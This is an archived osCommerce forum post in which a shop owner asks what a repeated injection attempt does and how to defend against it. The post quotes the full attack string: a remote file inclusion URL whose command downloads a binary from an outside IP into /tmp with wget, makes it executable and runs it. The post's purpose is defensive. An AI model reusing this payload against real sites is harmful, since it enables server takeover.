Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

virus/worm trying to exploit osCommerce


homewetbar

Recommended Posts

Twice this week I've had a worm or user trying to inject code into our osCommerce site, but it is just giving them errors however I don't know if oscommerce is vulnerable to this?

 

Here is one of the strings they are trying to inject:

http://www.yoursite.com/index.php?option=c...x2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|

 

Any ideas on what this does and how to make sure we are protected against this?

Most Valuable OsCommerce Contributions:

Also Purchased (AP) Preselection (cuts this resource hogging query down to nothing) -- Contribution 3294

FedEx Automated Labels -- Contribution 2244

RMA Returns system -- Contribution 1136

Sort Products By Dropdown -- Contribution 4312

Ultimate SEO URLs -- Contribution 2823

Credit Class & Gift Voucher -- Contribution 282

Cross-Sell -- Contribution 5347

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...